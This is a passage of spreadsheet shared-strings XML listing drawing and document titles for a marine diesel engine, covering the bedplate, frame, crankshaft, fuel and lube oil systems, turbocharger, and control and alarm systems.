    <t>COOLING/HEATING SYSTEM</t>
  </si>
  <si>
    <t>INJECT.BODY SPAREPARTLIST</t>
  </si>
  <si>
    <t>LIST OF EXTER. CONNECTION</t>
  </si>
  <si>
    <t>MOUNTING OF PIPES</t>
  </si>
  <si>
    <t>TECHNICAL DATA FW-PUMP</t>
  </si>
  <si>
    <t>CALCULATION SPECIFICATION</t>
  </si>
  <si>
    <t>MOUNTING OF STAYS</t>
  </si>
  <si>
    <t>FORM+POS.TOL.-BEDPLATE</t>
  </si>
  <si>
    <t>FACE F.GENERAT.SECT.VIEWS</t>
  </si>
  <si>
    <t>BEDPLATE-INTERM.-MACHIN.</t>
  </si>
  <si>
    <t>BEDPLATE-MACHINING</t>
  </si>
  <si>
    <t>BEDPL.INTERM.FORE-WELDING</t>
  </si>
  <si>
    <t>BEDPL.INTERM.FORE-MACHIN.</t>
  </si>
  <si>
    <t>BEDPL.INTERM.AFT-MACHIN.</t>
  </si>
  <si>
    <t>BEDPLATE TOP VIEW-MACHIN.</t>
  </si>
  <si>
    <t>BEDPLATE BOTTOM VIEW</t>
  </si>
  <si>
    <t>BEDPLATE-INTERM.MACHINING</t>
  </si>
  <si>
    <t>BEDPLATE REAR SIDE</t>
  </si>
  <si>
    <t>BEDPLATE SPECIAL BORE</t>
  </si>
  <si>
    <t>COATING PROCESS LB/DLH</t>
  </si>
  <si>
    <t>MAKERS OF BEARINGS</t>
  </si>
  <si>
    <t>THRUST BEARING HOUSING</t>
  </si>
  <si>
    <t>LIFTING ATTACHMENT-OILPAN</t>
  </si>
  <si>
    <t>BEDPLATE FRONT VIEW</t>
  </si>
  <si>
    <t>SECTION IN BEDPLATE W.</t>
  </si>
  <si>
    <t>BEDPLATE,CAST IRON CHOCKS</t>
  </si>
  <si>
    <t>WELD DRAWING</t>
  </si>
  <si>
    <t>OUTLINE OF W.P.S.</t>
  </si>
  <si>
    <t>WELD.PROCED.SPECIFICATION</t>
  </si>
  <si>
    <t>HEAT TREAT.BEDPLATE+FRAME</t>
  </si>
  <si>
    <t>LIFT. TOOL FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>WHITEMETAL, MAIN BEARING</t>
  </si>
  <si>
    <t>WHITEMETAL IN JOURNAL BRG</t>
  </si>
  <si>
    <t>DRAWING OF TOOLS</t>
  </si>
  <si>
    <t>SEC.FOUNDATION FRAME WELD</t>
  </si>
  <si>
    <t>SEC.FOUNDATION FRAME MACH</t>
  </si>
  <si>
    <t>ADJUSTING SCREW IN BEDPL.</t>
  </si>
  <si>
    <t>BASE FRAME MAIN DIMENSION</t>
  </si>
  <si>
    <t>BASE FRAME FRONT WIEW MAC</t>
  </si>
  <si>
    <t>QUAL.SPEC.F.WELD.SUPP.FL.</t>
  </si>
  <si>
    <t>FORM+POS.TOL.-FRAME GIRD</t>
  </si>
  <si>
    <t>INSTRUCTION, FRAME BOX</t>
  </si>
  <si>
    <t>END FRAME-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>CUT.PLAN/PL.LIST-FR.BOX</t>
  </si>
  <si>
    <t>CUT.PLAN/PL.LIST-L.FR.BOX</t>
  </si>
  <si>
    <t>FRAME-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>FRAME GIR.-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>FRAME BOX-SECTIONAL VIEWS</t>
  </si>
  <si>
    <t>LOW.FRAME BOX-SECT.VIEWS</t>
  </si>
  <si>
    <t>MOUNTING OF MAIN BEARINGS</t>
  </si>
  <si>
    <t>FRAME BOX-INTERM.-WELDING</t>
  </si>
  <si>
    <t>FRAME BOX-INTERM.MACHIN.</t>
  </si>
  <si>
    <t>FR.BOX-INTERM.-FORE-MACH.</t>
  </si>
  <si>
    <t>FR.BOX-INTERM.-AFT-MACHIN</t>
  </si>
  <si>
    <t>FACE-SCAVENGING BOX</t>
  </si>
  <si>
    <t>FRAME-FOOT FLANGES</t>
  </si>
  <si>
    <t>THRUST WASHED,TIN-ALU.</t>
  </si>
  <si>
    <t>THRUST WASHER,LEAD-BRONZE</t>
  </si>
  <si>
    <t>FRAME BOX-INTERMEDIATE</t>
  </si>
  <si>
    <t>COORDINATE DIMENSIONS</t>
  </si>
  <si>
    <t>FRAME BOTTOM VIEW</t>
  </si>
  <si>
    <t>FRAME CAMSHAFT SIDE</t>
  </si>
  <si>
    <t>FRAME INTERMEDIATE SECT.</t>
  </si>
  <si>
    <t>FRAME AFT END</t>
  </si>
  <si>
    <t>FRAME-FORM AND POS.TOL.</t>
  </si>
  <si>
    <t>DIAGRAM FOR THERMOSENSORS</t>
  </si>
  <si>
    <t>BRG MAKERS,TIN-ALU.</t>
  </si>
  <si>
    <t>BRG MAKERS,LEAD-BRONZE</t>
  </si>
  <si>
    <t>LIST OF GUIDE BRG.SHELLS</t>
  </si>
  <si>
    <t>FRAME TOP &amp; CAMSHAFT SIDE</t>
  </si>
  <si>
    <t>FRAME SECTIONS FORE &amp; AFT</t>
  </si>
  <si>
    <t>MAKERS OF THERMOSENSORS</t>
  </si>
  <si>
    <t>FRAME, TOP &amp; SIDE VIEW</t>
  </si>
  <si>
    <t>FRAME, FORE SIDE</t>
  </si>
  <si>
    <t>FRAME SECTIONS TOP &amp; SIDE</t>
  </si>
  <si>
    <t>TEXT SHEET</t>
  </si>
  <si>
    <t>DRILL PLAN THERMAL SENSOR</t>
  </si>
  <si>
    <t>SUPPL. DRAWING FRAME</t>
  </si>
  <si>
    <t>BEARING SHELL-CAMSHAFT</t>
  </si>
  <si>
    <t>OUTL. ENG. INLET DRAINBOX</t>
  </si>
  <si>
    <t>COVER WITH RELIEF VALVE</t>
  </si>
  <si>
    <t>PLATE LIST-TOP UNIT</t>
  </si>
  <si>
    <t>CYL. FRAME INTERM.SECT.</t>
  </si>
  <si>
    <t>CYLINDER FRAME FORE END</t>
  </si>
  <si>
    <t>CYLINDER FRAME AFT END</t>
  </si>
  <si>
    <t>CYLINDER FRAME TOP VIEW</t>
  </si>
  <si>
    <t>CYL. FRAME BOTTOM VIEW</t>
  </si>
  <si>
    <t>CYL. FRAME CAMSHAFT SIDE</t>
  </si>
  <si>
    <t>CYLINDER FRAME EXH. SIDE</t>
  </si>
  <si>
    <t>FORM + POS.TOL.-CYL.FRAME</t>
  </si>
  <si>
    <t>QUALITY INSTR.F.CYL.LINER</t>
  </si>
  <si>
    <t>MEAS.POINTS,CYL.LIN. WEAR</t>
  </si>
  <si>
    <t>Q.INSTR.CYL.COVERS,S/U35P</t>
  </si>
  <si>
    <t>VALVES-ARRANGEMENT</t>
  </si>
  <si>
    <t>COMBUSTION CHAMBER</t>
  </si>
  <si>
    <t>CYL.COV.UP.PART-FRONTVIEW</t>
  </si>
  <si>
    <t>CYL.COV.UP.PART-SIDE VIEW</t>
  </si>
  <si>
    <t>CYL.COV.UP.PART-BOTT.VIEW</t>
  </si>
  <si>
    <t>EXHAUST DUCT-CROSS SECT.</t>
  </si>
  <si>
    <t>INLET DUCT CROSS SECTION</t>
  </si>
  <si>
    <t>CYL.COV.UP-PLANE SECT.</t>
  </si>
  <si>
    <t>CYL.COV.-UPPER-CROSS SECT</t>
  </si>
  <si>
    <t>CYL.COVER SIDE VIEW</t>
  </si>
  <si>
    <t>CYL.COVER BOTTOM VIEW</t>
  </si>
  <si>
    <t>CYLINDER COVER SECTION</t>
  </si>
  <si>
    <t>CYL.COVER CROSS SECTION</t>
  </si>
  <si>
    <t>CYL.COVER COOLING BORES</t>
  </si>
  <si>
    <t>CYL. COVER FRONT, BOTTOM</t>
  </si>
  <si>
    <t>CYL.COVER,FUEL VALVE SECT</t>
  </si>
  <si>
    <t>CYL. COVER, LOWER SECTION</t>
  </si>
  <si>
    <t>CYL.COVER,DETAILS,SECTION</t>
  </si>
  <si>
    <t>INLET DUCT, SECTION</t>
  </si>
  <si>
    <t>EXHAUST DUCT, SECTION</t>
  </si>
  <si>
    <t>TIGHTEN.-CYL.COVER NUTS</t>
  </si>
  <si>
    <t>ADAPTATION-CYL.COVER</t>
  </si>
  <si>
    <t>CRANKSHAFT VIEW FROM FORE</t>
  </si>
  <si>
    <t>CRANKSHAFT VIEW FROM AFT</t>
  </si>
  <si>
    <t>FORM + POS.TOL.CRANKSHAFT</t>
  </si>
  <si>
    <t>BALANCING DATA</t>
  </si>
  <si>
    <t>APPROBATION DRAWING</t>
  </si>
  <si>
    <t>END CLEARANCE-CRANKSHAFT</t>
  </si>
  <si>
    <t>CRANKSHAFT TOLERANCE VAL.</t>
  </si>
  <si>
    <t>FORM AND POS-TOLERANCES</t>
  </si>
  <si>
    <t>LIST FOR CRANKSHAFTS</t>
  </si>
  <si>
    <t>LIST OF CR.SHAFT MATR.</t>
  </si>
  <si>
    <t>QUAL.SPEC.FORGED CR.SHAFT</t>
  </si>
  <si>
    <t>Q.INST.WHITE MET.IN BEAR.</t>
  </si>
  <si>
    <t>ALARM</t>
  </si>
  <si>
    <t>BEDPLATE,SPECIAL BORE</t>
  </si>
  <si>
    <t>DIAMETER CLEARANCE</t>
  </si>
  <si>
    <t>CONN.ROD BRG. LEAD-BRONZE</t>
  </si>
  <si>
    <t>CONN.ROD BEARING TIN-ALU</t>
  </si>
  <si>
    <t>METAL-CROSSHEAD BEARING</t>
  </si>
  <si>
    <t>TIGHTENING SPECIFICATION</t>
  </si>
  <si>
    <t>LIST OF CONN. ROD BEARING</t>
  </si>
  <si>
    <t>CRANK BEARING, COMPLETE</t>
  </si>
  <si>
    <t>CRANK BEARING W/METAL CUT</t>
  </si>
  <si>
    <t>SURFACE TREATMENT OF ROD</t>
  </si>
  <si>
    <t>PIST.ROD SCRAPER RG, LIST</t>
  </si>
  <si>
    <t>CROSSHEAD SECTIONS</t>
  </si>
  <si>
    <t>FLAME-HARD.INST.PIST.ROD</t>
  </si>
  <si>
    <t>QC.INST.PIST.CROWN L-GB</t>
  </si>
  <si>
    <t>L-GB PISTON CROWN WELDING</t>
  </si>
  <si>
    <t>RING GROOVE</t>
  </si>
  <si>
    <t>LIST OF PISTON RINGS</t>
  </si>
  <si>
    <t>PISTON ALIGNMENT NEW ENG.</t>
  </si>
  <si>
    <t>EXH.VALVE PNEUM.DIAGRAM</t>
  </si>
  <si>
    <t>EXHAUST VALVE-CLEARANCE</t>
  </si>
  <si>
    <t>ORIFICE PLUG, ARRANGEMENT</t>
  </si>
  <si>
    <t>MOUNT. TOOLS FOR VALVES</t>
  </si>
  <si>
    <t>VALVE SEAT GRINDER</t>
  </si>
  <si>
    <t>SUPPORT GRINDER</t>
  </si>
  <si>
    <t>DRAWINGS OF PARTS</t>
  </si>
  <si>
    <t>DIMENSIONAL SKETCH</t>
  </si>
  <si>
    <t>PI SHOT-PEENING</t>
  </si>
  <si>
    <t>FUEL NOZZLE HOLE DIA. RPM</t>
  </si>
  <si>
    <t>FUEL NOZZLE, DETAIL</t>
  </si>
  <si>
    <t>TECH.DATA-SHIM &amp; CAM LEAD</t>
  </si>
  <si>
    <t>PLACING OF FUEL CAMS.</t>
  </si>
  <si>
    <t>LIST OF CAMSHAFTS</t>
  </si>
  <si>
    <t>CAMSHAFT/DATASET F. MACH.</t>
  </si>
  <si>
    <t>MOUNTING OF FUEL CAM</t>
  </si>
  <si>
    <t>INSTRUCTION ROLLER GUIDE</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME TOP VIEW</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME FRONT SIDE</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME REAR SIDE</t>
  </si>
  <si>
    <t>LOCKING OF REVERSING LINK</t>
  </si>
  <si>
    <t>ADJUSTM.OF REVERSING MECH</t>
  </si>
  <si>
    <t>CAMSH.FRAME FORM+POS.TOL.</t>
  </si>
  <si>
    <t>HYDR. "MOMENT KOMP"</t>
  </si>
  <si>
    <t>HYDRAULIC SYS. INSTRUCT.</t>
  </si>
  <si>
    <t>MARKING OF CHAINS</t>
  </si>
  <si>
    <t>ADJUSTM.OF REVER.MECHAN.</t>
  </si>
  <si>
    <t>ADJUSTM.OF CAMSHAFT</t>
  </si>
  <si>
    <t>REPAIRS AND ALTERATIONS</t>
  </si>
  <si>
    <t>IDLERS ASSEMBLY COMPLETE</t>
  </si>
  <si>
    <t>MILL. OF REV. CRANK</t>
  </si>
  <si>
    <t>MARKING OF CAM</t>
  </si>
  <si>
    <t>FEELER LENGTHS F.INSTRUM.</t>
  </si>
  <si>
    <t>PRESSURE GAUGE INSTRUMENT</t>
  </si>
  <si>
    <t>INSTRUMENTATION-ST.AIR</t>
  </si>
  <si>
    <t>OIL MIST DETEC.-GRAVINER</t>
  </si>
  <si>
    <t>HOLES F.OIL MIST DETECTOR</t>
  </si>
  <si>
    <t>COCOS-EDS,HARDWARE</t>
  </si>
  <si>
    <t>ARR.OF INSTRUMENTS</t>
  </si>
  <si>
    <t>ARR. OF PRINT CARDS</t>
  </si>
  <si>
    <t>PLUNGER-FUEL PUMP</t>
  </si>
  <si>
    <t>INSPECTION GAUGE-P.BARREL</t>
  </si>
  <si>
    <t>ACME THREADS, NOM.MEAS.</t>
  </si>
  <si>
    <t>ACME THREADS,TOLERANCES</t>
  </si>
  <si>
    <t>ADJUSTMENT OF FUEL PUMP</t>
  </si>
  <si>
    <t>ADJ. OF CONTR. AIR SYSTEM</t>
  </si>
  <si>
    <t>SUPPL.DRAWING F.FUEL PUMP</t>
  </si>
  <si>
    <t>ELECTROMECH.INTERLOCKING</t>
  </si>
  <si>
    <t>MAN.CONSOLE,CONVERSION</t>
  </si>
  <si>
    <t>PULL ROD CONNECTIONS</t>
  </si>
  <si>
    <t>CODE FOR RELAYS</t>
  </si>
  <si>
    <t>PILOT LAMP</t>
  </si>
  <si>
    <t>OVERSPEED CONTROL SYSTEM</t>
  </si>
  <si>
    <t>ASS.OF OVERSPEED RELAY</t>
  </si>
  <si>
    <t>DESCRIPTION OF RELAY BOX</t>
  </si>
  <si>
    <t>3-WAY BALL VALVE</t>
  </si>
  <si>
    <t>SPARE PART FOR IMO PUMPS</t>
  </si>
  <si>
    <t>LIST OF BRIDGE CONTROL</t>
  </si>
  <si>
    <t>ADJUSTING-TEXT</t>
  </si>
  <si>
    <t>EL.COMPONENTS ON ENGINE</t>
  </si>
  <si>
    <t>DIAGRAM-CONTROL PANEL</t>
  </si>
  <si>
    <t>DIAGRAM EL-MECH.INTERL.</t>
  </si>
  <si>
    <t>DIAGRAM-CONNECTING BOX</t>
  </si>
  <si>
    <t>DIAGRAM-SHUTDOWN SYSTEM</t>
  </si>
  <si>
    <t>DIAGRAM-ALARM PANEL</t>
  </si>
  <si>
    <t>DIAGRAM-START AND STOP</t>
  </si>
  <si>
    <t>POSITION TRANSMITTER ARR.</t>
  </si>
  <si>
    <t>KEY DIAGRAM</t>
  </si>
  <si>
    <t>DIAGRAM-POINTER INSTRUM.</t>
  </si>
  <si>
    <t>DIAGRAM SLOW-TURNING</t>
  </si>
  <si>
    <t>CONTR.EQUIPM.F.FUEL PUMPS</t>
  </si>
  <si>
    <t>BLOCKDIAGRAM</t>
  </si>
  <si>
    <t>REQUIREM. SPEC.CYL.CUTOUT</t>
  </si>
  <si>
    <t>UNATTENDED MACH. SPACES</t>
  </si>
  <si>
    <t>SAFETY SYSTEM REQUIREMENT</t>
  </si>
  <si>
    <t>ENGINE ROOM LAYOUT DIAGR.</t>
  </si>
  <si>
    <t>ALARM SYSTEM REQUIREMENTS</t>
  </si>
  <si>
    <t>SPEC.OF VIT SYSTEM</t>
  </si>
  <si>
    <t>LIST OF PARAMETERS</t>
  </si>
  <si>
    <t>SLOW DOWN REQUIREMENTS</t>
  </si>
  <si>
    <t>LOAD CONTROL REQUIREMENTS</t>
  </si>
  <si>
    <t>SPEC.OF LOAD CH.DEP.LUB.</t>
  </si>
  <si>
    <t>SPEC.OF AVM ALARM/SL.DOWN</t>
  </si>
  <si>
    <t>LIST OF SENSORS</t>
  </si>
  <si>
    <t>BYPASS SYSTEM, EL.DIAGRAM</t>
  </si>
  <si>
    <t>SILK-SCREEN PRINT</t>
  </si>
  <si>
    <t>ARR. OF PMI EQUIPMENT</t>
  </si>
  <si>
    <t>EL. DIAGRAM - PMI SYSTEM</t>
  </si>
  <si>
    <t>TIGHTENING OF TRAVEL SENS</t>
  </si>
  <si>
    <t>HOLES FOR PMI SENS FRAME</t>
  </si>
  <si>
    <t>EL.DIAGRAM-SCUFFING SYST.</t>
  </si>
  <si>
    <t>HOLES FOR SCUFFING SENS</t>
  </si>
  <si>
    <t>DIAGRAM-INTERMITT.LUBRIC</t>
  </si>
  <si>
    <t>HOLES FOR CYL.WEAR SENS</t>
  </si>
  <si>
    <t>VMON SYSTEM EL. DIAGRAM</t>
  </si>
  <si>
    <t>BRG.MONITORING, SLOW DOWN</t>
  </si>
  <si>
    <t>HOLE FOR TEMP.SENS.,COVER</t>
  </si>
  <si>
    <t>HOLES F.PISTON RING SENS</t>
  </si>
  <si>
    <t>HOLES F.TEMP.SENSOR LINER</t>
  </si>
  <si>
    <t>HOLES FOR TACHO PICK-UP</t>
  </si>
  <si>
    <t>HOLES F.POS.PINS,FLYWHEEL</t>
  </si>
  <si>
    <t>HOLES FOR MIP EQUIPMENT</t>
  </si>
  <si>
    <t>GUIDANCE VAL.-AUTOMATION</t>
  </si>
  <si>
    <t>GRAPH FOR GOVERNOR</t>
  </si>
  <si>
    <t>EL.GOVERNOR SYSTEM</t>
  </si>
  <si>
    <t>ADAPT.OF ENGINE,DE-RATING</t>
  </si>
  <si>
    <t>ARR.OF GOVENOR BOOSTER</t>
  </si>
  <si>
    <t>PUMP GROUP-TEXT SHEET</t>
  </si>
  <si>
    <t>DIAGR.ARR-OVERSPEED PIPE</t>
  </si>
  <si>
    <t>OVERSPEED STOP DIAGRAM</t>
  </si>
  <si>
    <t>SHAFT FOR GOVERNOR DRIVE</t>
  </si>
  <si>
    <t>INSTRUCTION, ECS</t>
  </si>
  <si>
    <t>AIRSUPPLY REVERSING SYST.</t>
  </si>
  <si>
    <t>DIAGR.OF CONTR.AIR F. NOX</t>
  </si>
  <si>
    <t>DENOX CONTROL SPEC.</t>
  </si>
  <si>
    <t>SELECTION TABLE</t>
  </si>
  <si>
    <t>COUPLING FOR PUMP</t>
  </si>
  <si>
    <t>ARR.OF MASTER VALVE</t>
  </si>
  <si>
    <t>ASSY OF FUEL PUMP TRANSM.</t>
  </si>
  <si>
    <t>ASSY OF FLANGE BEARING</t>
  </si>
  <si>
    <t>CABLE PLAN</t>
  </si>
  <si>
    <t>PLATES FOR BRACKET</t>
  </si>
  <si>
    <t>VENTING-TEST DEVICE</t>
  </si>
  <si>
    <t>INSTRUCTIONS-MAN.SYST.</t>
  </si>
  <si>
    <t>DESCRIPTION OF MAN.SYST.</t>
  </si>
  <si>
    <t>TEXT SHEET-ARR.SWITCHES</t>
  </si>
  <si>
    <t>DESCRIPT.ENG.CONTROL SYST</t>
  </si>
  <si>
    <t>NETWORK MS 45</t>
  </si>
  <si>
    <t>RPM-FUEL INDEX CURVE</t>
  </si>
  <si>
    <t>SHOP TRIALS,DELIVERY TEST</t>
  </si>
  <si>
    <t>SEQUENCE DIAGRAM</t>
  </si>
  <si>
    <t>TELEGRAPH ORDERS</t>
  </si>
  <si>
    <t>ADJUSTM.OF REGUL.GEAR</t>
  </si>
  <si>
    <t>ADJUSTM.OF REDUC.VALVE</t>
  </si>
  <si>
    <t>GAS SYST.- DUAL FUEL ENG.</t>
  </si>
  <si>
    <t>ARR.PULL ROD CONNECTIONS</t>
  </si>
  <si>
    <t>PNEUMATIC DIAGRAM</t>
  </si>
  <si>
    <t>SHOP TRIALS TCS/PTI</t>
  </si>
  <si>
    <t>CAPACITIES FOR PTU</t>
  </si>
  <si>
    <t>NEC. CAP. FOR TCS/PTI</t>
  </si>
  <si>
    <t>NEC. CAP. FOR PTO/PTI</t>
  </si>
  <si>
    <t>NEC.CAP.FOR PTO/RCF</t>
  </si>
  <si>
    <t>ENG.PREP. PTO/RCF,TCS/PTI</t>
  </si>
  <si>
    <t>EXH.PIPE,POWER TURBINE</t>
  </si>
  <si>
    <t>TCS/PTI OUTLINE</t>
  </si>
  <si>
    <t>PTO/RCF OUTLINE</t>
  </si>
  <si>
    <t>PTO/PTI OUTLINE</t>
  </si>
  <si>
    <t>PTO/GCR OUTLINE</t>
  </si>
  <si>
    <t>LUB. OIL FILLING FOR RCF</t>
  </si>
  <si>
    <t>SCHEM. PIPE ARR.-TCS</t>
  </si>
  <si>
    <t>PIPE CONNECTIONS FOR RCF</t>
  </si>
  <si>
    <t>PTU LUB. OIL SYSTEM</t>
  </si>
  <si>
    <t>PIPE CONNECTIONS,PTO/GCR</t>
  </si>
  <si>
    <t>FORE END - PTO/TCS</t>
  </si>
  <si>
    <t>MAX.FORCES ON PTU</t>
  </si>
  <si>
    <t>POWER TURBINE OUTLINE</t>
  </si>
  <si>
    <t>PTO SHAFT - ENGINE END</t>
  </si>
  <si>
    <t>LUB.OIL PIPE CON.FOR PTO</t>
  </si>
  <si>
    <t>M. OF SAFETY AND IND. V.</t>
  </si>
  <si>
    <t>MIKRO SWITCH</t>
  </si>
  <si>
    <t>REDUCING JOINT</t>
  </si>
  <si>
    <t>ADJUSTM.OF COMPENSATOR</t>
  </si>
  <si>
    <t>SCAVENGE AIR PIPES</t>
  </si>
  <si>
    <t>MANUFACTURING DESCRIPTION</t>
  </si>
  <si>
    <t>GUIDE FOR DAMPER PLATE</t>
  </si>
  <si>
    <t>SOUND INSULATION, SPEC.</t>
  </si>
  <si>
    <t>FLANGE FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1+8</t>
  </si>
  <si>
    <t>PULSE CONVERTER</t>
  </si>
  <si>
    <t>PIPE FOR PI31</t>
  </si>
  <si>
    <t>WELDING SPECIFICATION</t>
  </si>
  <si>
    <t>SURFACE TREATMENT</t>
  </si>
  <si>
    <t>EXH.PIPE SYSTEM-DIMENSION</t>
  </si>
  <si>
    <t>EXHAUST SYST. INSTRUCTION</t>
  </si>
  <si>
    <t>EXHAUST GAS NOISE</t>
  </si>
  <si>
    <t>EXHAUST GAS PIPE BRAGING</t>
  </si>
  <si>
    <t>DRILLING PLAN FOR T.C.</t>
  </si>
  <si>
    <t>TUNING WHEEL LOADS, DIAG.</t>
  </si>
  <si>
    <t>CRANKSH.FORE,STATIC LOADS</t>
  </si>
  <si>
    <t>ARR.OF FLYWHEEL</t>
  </si>
  <si>
    <t>STARTING AIR DIAGRAM</t>
  </si>
  <si>
    <t>SUPPL.DRAW.F.FUEL.O.FILT.</t>
  </si>
  <si>
    <t>OUTLINE-LUB.OIL FILTER</t>
  </si>
  <si>
    <t>LUBRICATING OIL FILTER</t>
  </si>
  <si>
    <t>SPARE PARTS F.GLACIER F.</t>
  </si>
  <si>
    <t>SUPPL.DRAW.F.LUB.O.FILTER</t>
  </si>
  <si>
    <t>GUARD FOR LUB. OIL FILTER</t>
  </si>
  <si>
    <t>LIST OF LUB.OIL COOLERS</t>
  </si>
  <si>
    <t>LIST OF COMBINED COOLERS</t>
  </si>
  <si>
    <t>GUARDS FOR COOLERS</t>
  </si>
  <si>
    <t>INLET OIL COOLER</t>
  </si>
  <si>
    <t>PISTON CONTROL TRANS. Y56</t>
  </si>
  <si>
    <t>CORE Y56F</t>
  </si>
  <si>
    <t>SETUP, CYL.LUBRICATOR.MCU</t>
  </si>
  <si>
    <t>GENERATOR DRIVE</t>
  </si>
  <si>
    <t>MEASURING CONVERTER</t>
  </si>
  <si>
    <t>GENERATOR+WRONG-WAY ALARM</t>
  </si>
  <si>
    <t>WRONG-WAY ALARM SYSTEM</t>
  </si>
  <si>
    <t>TOOLS FOR LUBRICATOR</t>
  </si>
  <si>
    <t>DIAGRAM FOR W.WAY ALARM</t>
  </si>
  <si>
    <t>ARR. OF IMO-PUMP</t>
  </si>
  <si>
    <t>SPARE PART FOR LUB.O.PUMP</t>
  </si>
  <si>
    <t>F.O. SERVICE SYSTEM</t>
  </si>
  <si>
    <t>L.T. COOLING SYSTEM</t>
  </si>
  <si>
    <t>H.T. COOLING SYSTEM</t>
  </si>
  <si>
    <t>DIAGR.ARR.FUEL GAS &amp; OIL</t>
  </si>
  <si>
    <t>TECH.DATA,TURBOCH./BYPASS</t>
  </si>
  <si>
    <t>TECH.DATA, TURBOCHARGER</t>
  </si>
  <si>
    <t>TURBOCH.OTHER THAN B+W</t>
  </si>
  <si>
    <t>TC/AC UNIT</t>
  </si>
  <si>
    <t>GAS PIPES</t>
  </si>
  <si>
    <t>GAS MAIN PIPE</t>
  </si>
  <si>
    <t>EMISSION &amp; NOISE REQUIRM.</t>
  </si>
  <si>
    <t>BLOWER PERFORMANCE CURVES</t>
  </si>
  <si>
    <t>AUXILIARY BLOWER CAPACITY</t>
  </si>
  <si>
    <t>EL.MOTOR FOR AUX.BLOWER</t>
  </si>
  <si>
    <t>CHEM.CLEAN.&amp;BOIL.OUT.A.C.</t>
  </si>
  <si>
    <t>TEXT: TC REP.+BLOCKING</t>
  </si>
  <si>
    <t>TEXT: AIR COOLER REP.</t>
  </si>
  <si>
    <t>TEXT: AIR COOLER CLEANING</t>
  </si>
  <si>
    <t>TEXT: AUX.BLOWER SYSTEM</t>
  </si>
  <si>
    <t>SUPPORT, PLATFORM</t>
  </si>
  <si>
    <t>SCREW SECTION</t>
  </si>
  <si>
    <t>AIRCOOLER FRAME-AFT, WELD</t>
  </si>
  <si>
    <t>PLATFORM-SECTION</t>
  </si>
  <si>
    <t>PLATFORM ARR. UPPER</t>
  </si>
  <si>
    <t>UPPER GALLERY OUTLINE</t>
  </si>
  <si>
    <t>LOWER GALLERY OUTLINE</t>
  </si>
  <si>
    <t>BRACK. ARR. FOR RENK GEN.</t>
  </si>
  <si>
    <t>TOP VIEW-SEATING(SKETCH)</t>
  </si>
  <si>
    <t>DIMENSIONS OF PLATFORM</t>
  </si>
  <si>
    <t>EQUAL TEE COUPLING</t>
  </si>
  <si>
    <t>SLOTTED HEADLESS SCREW</t>
  </si>
  <si>
    <t>Q.INSP.WHITE M. THRUST B.</t>
  </si>
  <si>
    <t>THRUST BEARING-ALARM</t>
  </si>
  <si>
    <t>ARR.OF FUEL O. CONNECTION</t>
  </si>
  <si>
    <t>FUEL OIL OUTLET FILTER</t>
  </si>
  <si>
    <t>COOLING OIL INLET</t>
  </si>
  <si>
    <t>COOLING OIL OUTLET</t>
  </si>
  <si>
    <t>DRAIN OUTLET</t>
  </si>
  <si>
    <t>VAR.PIPES-MAN.+REAR SIDE</t>
  </si>
  <si>
    <t>LIST OF FLANGES-B+W T.C.</t>
  </si>
  <si>
    <t>ENGINE OUTLINE</t>
  </si>
  <si>
    <t>ENGINE PIPE CONNECTIONS</t>
  </si>
  <si>
    <t>SCALED ENGINE OUTLINES</t>
  </si>
  <si>
    <t>ALTERATION OF F.O.SYSTEM</t>
  </si>
  <si>
    <t>FUEL OIL HOMOGENIZER</t>
  </si>
  <si>
    <t>DRAIN-INFI/INVA VALVES</t>
  </si>
  <si>
    <t>INLET DRAINBOX</t>
  </si>
  <si>
    <t>FUEL OIL BY-PASS PIPE</t>
  </si>
  <si>
    <t>OUTL. ENG. INL.DRAIN BOX</t>
  </si>
  <si>
    <t>OUTL.F.OIL PR.PUMP I.FILT</t>
  </si>
  <si>
    <t>INSTR.FOR M. OF FLEX HOSE</t>
  </si>
  <si>
    <t>AUTOFRETTAGE SPECIFIKA.</t>
  </si>
  <si>
    <t>FUEL OIL SYSTEM,LIGHT OIL</t>
  </si>
  <si>
    <t>FUEL OIL SYSTEM,DIESEL O.</t>
  </si>
  <si>
    <t>FUEL SYST.H.F.O.MAIN+AUX.</t>
  </si>
  <si>
    <t>DUAL FUEL SYSTEM</t>
  </si>
  <si>
    <t>HEAVY FUEL OPERATION</t>
  </si>
  <si>
    <t>M.E. INTERNAL F.O. SYSTEM</t>
  </si>
  <si>
    <t>FUEL OIL PREHEATING CHART</t>
  </si>
  <si>
    <t>EMERGENCY OIL TANK F. T/C</t>
  </si>
  <si>
    <t>DIAGR.ARR.-FUEL OIL PIPES</t>
  </si>
  <si>
    <t>FUEL OIL DRAIN SYSTEM</t>
  </si>
  <si>
    <t>VAR.PIPES MAN.SIDE</t>
  </si>
  <si>
    <t>LUB. &amp; COOL. OIL PIPES</t>
  </si>
  <si>
    <t>FUEL OIL DRAIN PIPES</t>
  </si>
  <si>
    <t>MAIN PIPE-LOWEST GALLERY</t>
  </si>
  <si>
    <t>VAR.PIPES-L.GALL.MAN.SIDE</t>
  </si>
  <si>
    <t>LUB.OIL DISTRIBUTOR PIPE</t>
  </si>
  <si>
    <t>CYL. LUB.OIL PIPES</t>
  </si>
  <si>
    <t>BEDPLATE DRAIN PIPES</t>
  </si>
  <si>
    <t>VARIOUS PIPES-FRAME MAN.</t>
  </si>
  <si>
    <t>STUFFING BOX DRAIN PIPES</t>
  </si>
  <si>
    <t>CAMSHAFT LUB.OIL PIPES</t>
  </si>
  <si>
    <t>SCAV.AIRSPACE-DRAIN PIPES</t>
  </si>
  <si>
    <t>TURBOCH. LUB.OIL PIPES</t>
  </si>
  <si>
    <t>LUB. OIL FILTER</t>
  </si>
  <si>
    <t>ARR.OF SPRAY PIPE</t>
  </si>
  <si>
    <t>OUTLET FILTER</t>
  </si>
  <si>
    <t>SEALING OIL PIPES</t>
  </si>
  <si>
    <t>INLET DISTRIBUTOR PIPE</t>
  </si>
  <si>
    <t>LUB.O.SUCT.PIPE H.W. PUMP</t>
  </si>
  <si>
    <t>LUB.O.OUTL.HAND WING PUMP</t>
  </si>
  <si>
    <t>PIPE FOR PI21</t>
  </si>
  <si>
    <t>PIPE FOR PI22</t>
  </si>
  <si>
    <t>STARTING AIR PIPES</t>
  </si>
